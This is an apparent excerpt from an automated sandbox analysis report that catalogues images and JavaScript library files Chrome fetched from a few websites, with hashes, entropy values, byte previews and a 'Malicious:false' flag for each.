                                              Preview:RIFF...WEBPVP8X..............VP8 v........*....>.h.T)%8=...+...gns..1.4..?/..^....x>D.......l.W.<Z.;....|.3.rt.8.V....w...'.O..o..C.-.?......._.OD&....>..M."..]...........{.c.........~,.......?.\......B..Za.?D.....a..@...b0B.k..-...+&L......K....B......;....V(....k.T.. ..2..e.k..I.....':=...x_`.l.gL(^Nv}VoXG."....6I...|E.[...[.r. I.I..A...+j...S.G......4....k)......x....5E.|..O.x.._..+..;.s.!.`......W.6.U...ww~+g.<yS...~x.;.A.......'.\&..../..8.......9..-..H.HB..Y...f.51R..$)._...KO2W.~tR.......<..0....6....../...g.:z.|...q.....^.w..OVt.1P...m.Tb....e..T.9........kH...{|.h....'...vu.`....w.8......u.W......|.r.%..rM...rfz.......C.FJ.OR.....T..37l..96.6-M...~f:.f.......~.l....f.LI......p.....,.J....s..........0.%).U`%.UC.GR.%...mV..y...s.x?w.v]A.$...?..'.Z..[g.)."en:......y..!.b..v.V.].E.....s....A./..5.....<......s2....i.%.j..4%O+.e.......X........."6p.U&...#..X...L..}.....}.rOu..).B...w.|.0.....^iL_.F>...@..j.$Q9..}...c..5k..c`...`..v..R.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1778x1000, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):127310
                                              Entropy (8bit):7.998265911102095
                                              Encrypted:true
                                              SSDEEP:3072:4nK1IafhAguGqZp3DNOb+GeKBIuN8oaA7jAONdcKULpCWL4WwBze:ZfaZDNOb5ZBWZA7jCKGCg4g
                                              MD5:981F08E4358DA87F32F92DF013DA58FD
                                              SHA1:3E1547FB5B226C5803143AE2BDB833A95CF6278C
                                              SHA-256:BF35905A551D8CD03AC637D50F3189360F389E2D60CE7DA4212E7DFE535B4088
                                              SHA-512:975C5D08F05B29250FFE866F625BB9F66941A13CB9004F8FD713BFF185EF6E5588A2721D595C79E4233F5576C531BC349F700B4F0F94A0C62C9DE45E5BD5D178
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFF...WEBPVP8 :........*....>Q(.F#...#tz!...gA...g.?.5/.~.18.^...yI......l....._Y.d..._..>...#._..?.yE...........z.....^...?....=.K...'Xo..._....|.....?.....~..p.=...../.......v..?....;.....{.=$t........................s......zE./......;...O....K.......,.............|.~a.S.G._W......./......o..bou..._.G.?.?w.......o......C.........~.........`....}T.........?.......I....'........~ .......X.>.a.u.@....v3.@I.%.0.s...Q>.0..-15...m4m|^.....N..('.'........i..<....P<...%...c........7m..Q.\TBh....o....L..=>v...>.p.$..R.$.C....W..~5H.........v..tZ..].W.+a_..;PI...*.H.....c................1[Z....4.?..1.!4...M....!.d..._....M.U#..e~..<EW9Ek:...k...~Q.@|..["*B...O...JI.KC..Z...v.Z.&.,...J...5.(.L.W.}..D'....a.O...*w)e&.....#W..q^.b@.J....f.z....)..0F....k...tM....j..fL.../..H..4....?. .x).O..L.|Q...Y....!mI.r.A..k.....q@../.3.:...>.[.px..3..:v..`......e.:.h.x.....#..8..8.78.y.&...Yd.....j.Z...h..y...#..l..n?.fE.}.N...aI%.P.5,X..f....8.. ...-......%.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65240)
                                              Category:downloaded
                                              Size (bytes):70983
                                              Entropy (8bit):5.327801775978095
                                              Encrypted:false
                                              SSDEEP:1536:1NBwKyDBpQvvtM9eqZ08dJjhBhWDs06YPewGanrY:BwNsCC8zjhBhLLYPepEs
                                              MD5:A82082C20307C018D25EA8B433311D92
                                              SHA1:1EA141B4736B1D17A8B7A695434113AEBFA8F15F
                                              SHA-256:06F66C7BEB4164979A2BC183462DBBB4A148D374D6ACA4DC0B0548D8AEAE8387
                                              SHA-512:82C108B7370D916C5FC478EBE0168464077D62E456623C678FB73FCAE91C674FE759E8546F94E324DCB2BF5029094D83147FEA830FACB456473CE2A7A109C8B9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/gsap.min.js
                                              Preview:/*!. * GSAP 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t=t||self).window=t.window||{})}(this,function(e){"use strict";function _inheritsLoose(t,e){t.prototype=Object.create(e.prototype),(t.prototype.constructor=t).__proto__=e}function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function r(t){return"string"==typeof t}function s(t){return"function"==typeof t}function t(t){return"number"==typeof t}function u(t){return void 0===t}function v(t){return"object"==typeof t}function w(t){return!1!==t}function x(){return"undefined"
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):45146
                                              Entropy (8bit):7.995401942782514
                                              Encrypted:true
                                              SSDEEP:768:eO0ApJdOEitXJNHLR1vuJ2TVKY9wfu3DxbZPouF0OPe566P16H58pEu+WG5in:eO5zoXPHd1Gi9rTx1/F9RH5s3zG5G
                                              MD5:53CE7BE7619CB90A93A5CF16495D1A8E
                                              SHA1:9430BE01AF9A718C0DE318765309707218E95026
                                              SHA-256:D6F15D1C083F51B2DB1BD31F290748E4DF7A2F91720ABB9E0FD2454C2DDBB56C
                                              SHA-512:EAB99DCE3C06478AB3D14DC2A347BF6AA1455196AC25A45C185087063C9F973F1B084518E28C782223CCB835A7F86FF4F7E736B6FA7AB6E553D99B8CF026DA1D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi_webp/Jo_coLYPcOQ/sddefault.webp
                                              Preview:RIFFR...WEBPVP8 F....R...*....>m2.G$".%(.:P...InNb}...,s..l6.+..h...;......}....f.......?4...G....fz......Z.....O.......~...~......[....|_............W....\...F...........g.......s........j....;}.5...................*..._._t...S.?._.?.x.../.....R.y......k|:.....?.{.{m.....}.......................~.|..D.!.............0...w.o..!......./................K......n.....*uj.b.w.];z...0.D..$H."D.....W.$....f....Y...w`.....d....]...&d:.....eZ....3.3...(.f."..@.Y...9.....A..BDzi.2.x*/@..%..:'mH......BP...uU....5.5.^O.zbzs..fe............(.g.~.Yi./.q..?.g.{.(..,.<].U...yC..}.!m..6...`_..f.n...-..B.u.!.H....lx.nT..N..h.A.*.$..:......h.y.,b...#...u"..]........"y...<2]..h...wQ6....Im.4?.g..s..Tw......mJ.......".n ........xA!..~I...@uX.i.D.M^...........M.]`ZzQ.`..;..).A...B.*.....E.4.Y....dn..T...../..fU[;...mD...X...[..`.~....c....~..4Y....^.r...{..$....\...!....%.Nuz.x!..........CO.......YU9...R.>..a..d.....d.-....NE.5?j...b....i.%V?c.i.ZFW....^p$}M<.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2607
                                              Entropy (8bit):7.910351860503507
                                              Encrypted:false
                                              SSDEEP:48:8pG8ARoFJQf4ni/gWMzyqo+cn26sKJyz/zk/xk4lY0ixgGB+zc07:8pSRoFJQfcNyqa262/oy41ixgueb
                                              MD5:2ED04DEF040A8B75B1A403EC4384F0E3
                                              SHA1:0E9326D32D37121C24B06C86C78D2DC3C33875A6
                                              SHA-256:51B48CD82C0D1ABD2AEB00170FC184F29E5CA728BF930C16314EF95DBB1E7A83
                                              SHA-512:58A5064F8E8DF485297873243A7A5EAC4F972A3AA3FD70AF0301E42EC03281BAFF8A8F134934DD18C0C816AFA96B8C518F6BC51E6A7A2F11D1177F36F915167D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/payment-check.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..U..Q....Nn..B.....J.....J..L.....S..@..Q..;..C.Q..O..I$.Y....F..M....[..R.P_.U\..U.En.Up&.V$.a..[..I..P.....x.........D.F...(.G.D...H.x..[...W..j1.We.K....T......<.h..P}...PW.ze.........a..Mv....]....IDATh...v.........EAR...TD..&&...?...PR.....Z.H*..?......./.........y;.D../...-.Z.JQ..a..(. <~A..d.h..d\g.Ba..aQQ....!..(..e".B.\.k. 4^.6..<.+9H$*..D..0.z+.r]..V..g~......D.U...*a.!Y../.!"...&..xK.z.$C*T.d....!.C./...^...g.V.W.G.&.%_.....,..J&.$.J.TJ...dm....C.-ASu."..ta..Q.S..'H.B..{.v..F..sJV.D....7.|......)Y5...=$...9.,.rJj..C.~/......Jm.h.../T)9._.=<|....."..<>><<<>.x....'.............o..?E... .|...a...*. .?~@.. ...\.....F..?...?w.1v.\1..zhA....B..WRkT.a...]...Mk.?....3.2m..x..r.V.0....JUPKw..,.l.. qo..o@.(...!....Px.Q.....o..B..%...R.P..\0..wk4.x5..R. .u.7).e]O.,i,.O.n........kP...tKL.t:]6.).gM2..Vw6^H.r. ..........a....ynj@Y.....H.m..G.g=..{f.k2.39.6^3.z3..e...V'.....`...._L2b..<..$W.6%....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):79278
                                              Entropy (8bit):7.974495601645318
                                              Encrypted:false
                                              SSDEEP:1536:EB4xKgSAvVgHk0lvGafqVlkIjUbPLfOi84USf9MlYB67lSAb7pcK:EWxhSAvGlhGNWIjQP7FJUSf95B6l7pL
                                              MD5:9D96C460ECF406BF6F8BFC1464A5C70B
                                              SHA1:9063CCCD80F3E5E9873F58FEE3C60F815A562C67
                                              SHA-256:281C8B4E195F9B496C5EC98A5AC7E86E777CC18C43EDA8F5F922EDBA6D7C72B1
                                              SHA-512:517CFF8E815D4546B2A35CC45D3F392DF5FA053B6BE8825243E0922BEAF54E1A8B61B9AABE4B41AF8F15FF383AFD694826D68EC387DC5CF2DD159A8C056A7EC1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/10/610a9221fa6b94cfeb442620ff5d49ea.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."..................................................@.@.P.......P..P.AUUT...@...(.........8QL......................................*......].....@.P..PP.....T.EU.\.......*...(.*..(.(..5 @T.@.........QEU...QEW..((.*...*........QT.. ...........*.(.....*.(......(..*......(........(.(...(.(.(*...(............(.((.9EPU..*.....Q@...@.P.TP.QE.....U..@........P.W.(*.......(..........................((................(..............(...................*.............(.(.....(.(.......*...............(..(.r..*.........(...8.@PPp(.(..v..(............8......P...QATPP...E.E.QEPP..w&..Q@P.E...P.EU'..=.>oP.A@QAE.E.AE.P...P..U.U..v(A..`...............=.q...e....AE..G..*..(..8j..(.......+...............p......(..(((..........?O...,.\.....B. ....@..@QT].\..<...5..c..P...Q@.MdnX........^.&.C...!..vY.s...{>ml...((........}fe....M.].[3.....P
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 109x109, segment length 16, baseline, precision 8, 1478x1105, components 3
                                              Category:downloaded
                                              Size (bytes):191233
                                              Entropy (8bit):7.863448918651005
                                              Encrypted:false
                                              SSDEEP:3072:StLkVDeXSgmGpNsrkBSTOelLM1+Gwk1TdfRfv0daS4EF30AkbT6dJ8UqynkKeg8o:PVD7mxelLMJVpJFU3Vi278UlkKuvT5Bk
                                              MD5:5A969567100BBB615CFB79343405F6E8
                                              SHA1:531EE90C2C5935DE432D505F19F0C593CC4ABF8B
                                              SHA-256:12562A1AE1D1CF2EE91AEF8F379090E9246D414A4563341ECBD1BE5D2E0CE5ED
                                              SHA-512:FD670B07A9153D1D6A1632D239E5D2327DBAF5526AD143C4AC8FF09C1D257891D86CE00E788947C7268547CAA221931BC8845C13B18C051C7DFC330C2A010656
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/8/fd8e6d49cdeaeeb063abe01708f291e0.jpg
                                              Preview:......JFIF.....m.m.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15101
                                              Entropy (8bit):7.621391892961889
                                              Encrypted:false
                                              SSDEEP:384:BeFm4j+ccC2dloVS076M7cKYQpBlVctgxgFE8:KmX8E0mOcipzVctg98
                                              MD5:B2926BFD8C547A041B2BD1E950A49ED3
                                              SHA1:C7C9E8472F1E46242029A7E38FA16AA4C4E7D66D
                                              SHA-256:3ED6294A328E11091708F2C9D1C97D629634DB61549394E96A0BC9515BDB474F
                                              SHA-512:5F5CF0B5515E0876A864BE17B767F3209313F774799FED43D0BF0F0E66C97869971847087B6183F7C4D045454AD2383F0159625D64272A277D2A297E755152F0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/3/499a0fc603617199c984e7f48e7145a4.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:14149B18933E11ED8364C939D7A12684" xmpMM:DocumentID="xmp.did:14149B19933E11ED8364C939D7A12684"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:14149B16933E11ED8364C939D7A12684" stRef:documentID="xmp.did:14149B17933E11ED8364C939D7A12684"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................... ...-...:.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):5475
                                              Entropy (8bit):7.940805234117698
                                              Encrypted:false
                                              SSDEEP:96:0FdZlWOTSgj3T7QQJJzR8c9wGYg5z3Mw43cMrCggJp4UrIm/srFI9yfqtpkrtVpo:8nPjDRJ0cygGwacMGgg7PrlQIsiteJV+
                                              MD5:D2E4904BA9BDFEF458DC22F2745DCE56
                                              SHA1:7F88A35C592B974FC5C60C105708968DA8FC4C5D
                                              SHA-256:D402256EACC584CF2F01BA83E65C6A4D2DF050D1C5647C5619FFB9EF0FDCD096
                                              SHA-512:CA597477854BDAF5D65EB4B15A4A92B92EBD92321FA244B9B14C69DC49569F14067D5A87868305DFC345E24F87E792C79DCE57D5E9809CCD8061EAB77CD52680
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE................................................................t.......-......x...........S........~..Y..`........h.).........t..n........y..............i.....i.....n.....c........c.....o..............?z....~...........y.!........._..c.....F...........X.....g.....R....0......|..........f...i...........w..[........N..Y.'.....T...L.......x...8r...... ......p..Y....~.....p...e............`..^....3.N...................).....4...y.....s.K..J..a.......o......k.....V..<.$.e.......K........Z......U.yFr.e..8>{.....L.|.........%.....W.+..X.<jM..*..C\~qT........../.....3~.9..m..u..7\.o.^T.................5O6x......8......!..A..f..^..|.Q...A...Qt.:P@w.V...........d.......F-...K.9.....:......lIDATh...SSW..s....!/...IJ(.$..."...$.$b$@.YY^.$:ic......X]....U....A..TV.vi..;...;...>.......W.....s>.......Z..Z... 2..$I. ...VKh.zJ...t.O.s.H...z..w..B..x:E.9...0p..6.333Y,...O).@.........(.*.?Rz5.<.....0...<....:D.......t...9T)..BH=.O......HS(4..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12928
                                              Entropy (8bit):7.622308358842646
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwnghwrP0fRuF6UEMXXAYhu73fX5lMjlc9b4Qd67c5mhnIGp:4YNg7gCrPUIFAz3h6Q87eGp
                                              MD5:8F14CB921F071D3F17FB881315A95593
                                              SHA1:6E98F6FB5DE3A24FE44C975ACAFE29046E7651A8
                                              SHA-256:434245AD8ED6E75DDA29EB70FE724939D1FFF311DAA93114F5D096AF2A7B63C7
                                              SHA-512:783D8C84934B764C542FAC930C55C8E59DC78DD6EB277EFA069FC7DFAF11E67F1BCC80927932655C6BBF0B6BE1BE1AF3149F0A77D3831FF3A00F530E3569CA39
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/50/939c746c8878cd692d9091d1d3e61316.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:C++ source, Unicode text, UTF-8 text
                                              Category:downloaded
                                              Size (bytes):15462
                                              Entropy (8bit):4.7631132208138265
                                              Encrypted:false
                                              SSDEEP:384:KRUZX+dho80YckNurimDV1tiqOSCjhyJ7l:3G0vkNurimDV1tiqOSCjhqx
                                              MD5:68DB860EF27EE297057EFB0DC2ED8F2D
                                              SHA1:DEFD8F4F881474227DC5EA78D794BBE5A75ACE91
                                              SHA-256:F2BFA11147355FFA836C0DA40A4C98A906E2115AD6B6D6B8DEB37C29DF3014FA
                                              SHA-512:628834485E4A5B9E18A5672C673CC5DD734AFC61A2C123D8515B5133EEF7A2C2E42C5B648EF4B1F5392AB6B2E18396A568EAEF06C3DB2D50FB2EE25C946DDC4B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/vanilla-tilt.js
                                              Preview:var VanillaTilt = (function () {.'use strict';../**. * Created by Sergiu .andor (micku7zu) on 1/27/2017.. * Original idea: https://github.com/gijsroge/tilt.js. * MIT License.. * Version 1.8.0. */..class VanillaTilt {. constructor(element, settings = {}) {. if (!(element instanceof Node)) {. throw ("Can't initialize VanillaTilt because " + element + " is not a Node.");. }.. this.width = null;. this.height = null;. this.clientWidth = null;. this.clientHeight = null;. this.left = null;. this.top = null;.. // for Gyroscope sampling. this.gammazero = null;. this.betazero = null;. this.lastgammazero = null;. this.lastbetazero = null;.. this.transitionTimeout = null;. this.updateCall = null;. this.event = null;.. this.updateBind = this.update.bind(this);. this.resetBind = this.reset.bind(this);.. this.element = element;. this.settings = this.extendSettings(settings);.. this.reverse = this.settings.reverse ? -1 : 1;. this
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 738 x 512, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):32300
                                              Entropy (8bit):7.964108438343613
                                              Encrypted:false
                                              SSDEEP:768:rkjt2I4EziFAh2HOgfl+4+ZqKPX4sJTJ1Ua0cNsDPUeR:YJ21giBHFl+4rKPX4sVrYUeR
                                              MD5:A137FF38404DB2DE58F9F2D9699B420A
                                              SHA1:3417B7CDC5EBC8E782C8CC6C06007283F01DE41E
                                              SHA-256:E842D45FF11BCC6433704F07F1799887F15187F6FCA1B01ECA2383845DB65894
                                              SHA-512:053BAC6A5F5305EC7D42DC294505EEC13A07DD1A93F3132CFDA42357A6242EE146A2DC28B75CAA0542E15254AF90727590CE8F3B2AE101030286E5169EA19491
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/header/srv2.png
                                              Preview:.PNG........IHDR....................PLTELiq.;i.:h.?i.5i.9i.9g :f.:k.9i.;l.:j.<i.<j.#4....7a............... !$am...a........#......[cu..........o{....()2.............>AL.../06...JQ_...\>8....9y..j@8?o..~.tOF^]b1-._U&N..../a........4zG)$..2..S..b_..uk....1j.L..$%...W....tRNS.:0K....$...FB..[................................]....pHYs............... .IDATx...w...{..6.]c...v....e.(...9Yn..4I....9cJ....[ne..N.?.y55...].}..G.}..G.}..G.}..G......_.}.q........y#...s.Z.x[.....B......._.=7.Y...w(}.!.x1......}......O~K5..?}.q.8.H.....!}.s.V.xS!!....>yw...>.....y^.O .....(!e.. ?...OOx....U>q!}&....W.x.G...9.O....\..>........$h..../...q.8O...0.!...>.........#...#...30....G..#.D...?....i"E<..i2+'i6.}.x........'.qU.....~w.e.k...?%.....z......oG.) /H....>....j..?9.=.}T.....!....'.q...=.}..N..U!......fU..B....=.}l.n.~.g..O.U)..#.GE...O.~V#...!?vn<E<%.G....B3.RK..Y.........9.....V.B.....i....)...[.-at..v..z.?.d.)4\......-C......H?.T......W#.IE.iT\E...*....4..z./(.....{.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):86384
                                              Entropy (8bit):7.9978701531194
                                              Encrypted:true
                                              SSDEEP:1536:7eSt2hLopBoznBqTStFRFfODZ/zlIrLmfOecjKA7u1bdyb0xrAy7giqSIpuov:SSt2VopBoznXFa/zl5Zyu1bAmrr7gzpJ
                                              MD5:17D930533C1832197577D741F2200C41
                                              SHA1:04C72A67385424D3CEB57EC13ED14C8581A27CD0
                                              SHA-256:E6B1F21C0D3081145A68E27D669046EAE07405DCABB17015073F873907A0C8FC
                                              SHA-512:B794011BCF3EBBA724B0F6286F2A58F03AD8817D9AF3BA1070D0FD4DDA07C4D3D58C216DD44D1664FD1A047B3419D8F9F2119479A1DBB06F5A7FA5D2D0318CAF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/27/90299ab973339b4f1441f267ea92a6d7.webp
                                              Preview:RIFFhQ..WEBPVP8X..............VP8 .P..P....*....>.l.R)%..%......eA..S..j.W.n.p.......'.zj^m......y.$>...... .0o.n.....:v..'..?...`....;.....g.'..._T?.=.~...z......i...........E...y....^..k......P~.?...._.n......_..........o.....y2..r6..+...;.O.....}..o...............N..x.}...._.7.....>.......O..a..._...zO..W..d1{*...J.t..g..%H.QH.MU.y.SK.t3....4.Y..Jg.h.S.oy.....C.|.RSN..}...%A@..pl.:d-."b...P....&...=.......(......U..]...LZ..4.F5N..X[...?........G6u..&.(k...9......r.M..>0..'..I.......N.'Z.P.mQN.$............"..@\K..b.....B...W...l...M@.........fy..f...B....nx/k........^...8.y...~.hF.l9.~im.....n-[^.+X.Q,Gi....#9C..".{257.{......_S1.......V...u.5...@.....{El.......S1F..3C_,C..8...W..;..m.o....A~....C[.;I:@.igKj^@;Yu.].eQ~.O...\..Um9>..P...qQh.n.-...;.sJ2AK!.......m%$..N...^D(Lc.T`.h...G ...r.Z.APc.....[8.....{`..E.V....8.8s.>S.d.G.N.x....`..?.sA.f...I...1t...o.......y^|.k.{.w.V..1h.N..2.uo.]>TZe..7..%..l.o.^.C...C. .he.D....Y...{I.A.Y..8.sn.n.!K
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16542
                                              Entropy (8bit):7.7362615097742475
                                              Encrypted:false
                                              SSDEEP:384:4YNg7K20Jqp/cadcjQrN6fp5dwWZZ77VhzkJCI:4Yy0Js+jQsJwWZZXVZ0d
                                              MD5:9E5A06A51471D83F69C600D631C569DA
                                              SHA1:0C36EAE5DB2F22C9B9B976A3DB38373A7833A7BA
                                              SHA-256:9EE64BCB4FDBE5C6A2937BEDD30967BD42C2A906B35179850CC213EA7B21FD76
                                              SHA-512:2B56DFDDBE9EEAC8137D9127333E22DC29AF4AD41F1D6DDD90C57D1625FFBCD1633C9A888E227A160888F821E5A0D2955D98DEF3E63ACE8BA37F1F37103E79DE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (15208)
                                              Category:dropped
                                              Size (bytes):15590
                                              Entropy (8bit):5.522003918487033
                                              Encrypted:false
                                              SSDEEP:384:trEawZ1w8LNjr4lQWszZus4/CaCKgiLEG:7wvRmj+aCKgiLh
                                              MD5:60144315C1CFB721751584D3EFAFC958
                                              SHA1:21441FBC79208A2DE2BD63156F5805B21B450522
                                              SHA-256:598794CF8CA8FD2A48D013A06D8E153B34532A49F5F5D5890EA0E220C0275EEE
                                              SHA-512:2705310B61F919ADDD6623742EBE572F74731F695DE00AE782972A19D60CCF0332A4F8819FD2C249E1E73844F56BDAAF816E4ED8B3BDDCAE8AE2B92B73E67FB8
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * SplitText 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * This plugin is a membership benefit of Club GreenSock and is only authorized for use in sites/apps/products developed by individuals/companies with an active Club GreenSock membership. See https://greensock.com/club. * @author: Jack Doyle, jack@greensock.com. */..!function(D,u){"object"==typeof exports&&"undefined"!=typeof module?u(exports):"function"==typeof define&&define.amd?define(["exports"],u):u((D=D||self).window=D.window||{})}(this,function(D){"use strict";var _=/([\uD800-\uDBFF][\uDC00-\uDFFF](?:[\u200D\uFE0F][\uD800-\uDBFF][\uDC00-\uDFFF]){2,}|\uD83D\uDC69(?:\u200D(?:(?:\uD83D\uDC69\u200D)?\uD83D\uDC67|(?:\uD83D\uDC69\u200D)?\uD83D\uDC66)|\uD83C[\uDFFB-\uDFFF])|\uD83D\uDC69\u200D(?:\uD83D\uDC69\u200D)?\uD83D\uDC66\u200D\uD83D\uDC66|\uD83D\uDC69\u200D(?:\uD83D\uDC69\u200D)?\uD83D\uDC67\u200D(?:\uD83D[\uDC66\uDC67])|\uD83C\uDFF3\uFE0F\u200D\uD83C\uDF08|(?:\uD83C[\
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4119
                                              Entropy (8bit):7.947512826394149
                                              Encrypted:false
                                              SSDEEP:96:YMRL4uQQ7zMp3Sy4DUxsb8MoAtETrvtryeaqEC0brvGk:YMFyQ7zMphIwMVtEdfeGk
                                              MD5:65BC5DD91EA2554FE003ACAEB79D6E77
                                              SHA1:1D9710E190C6C4BAFC0AF77E061E450EB58CA416
                                              SHA-256:4CB6EA4CDBF6270AD0778CF651337AD71DDC942363CE0E39808B88163BB5F506
                                              SHA-512:A3A79653A2922872E7236FAB0829BF9423CFB2635CE30C6281705165C88347A2D1FBDB5595F7D5453D56CA21F0D089B08285C2ADF5DD3C3E79BB28B8F7E93720
                                              Malicious:false
                                              Reputation:low
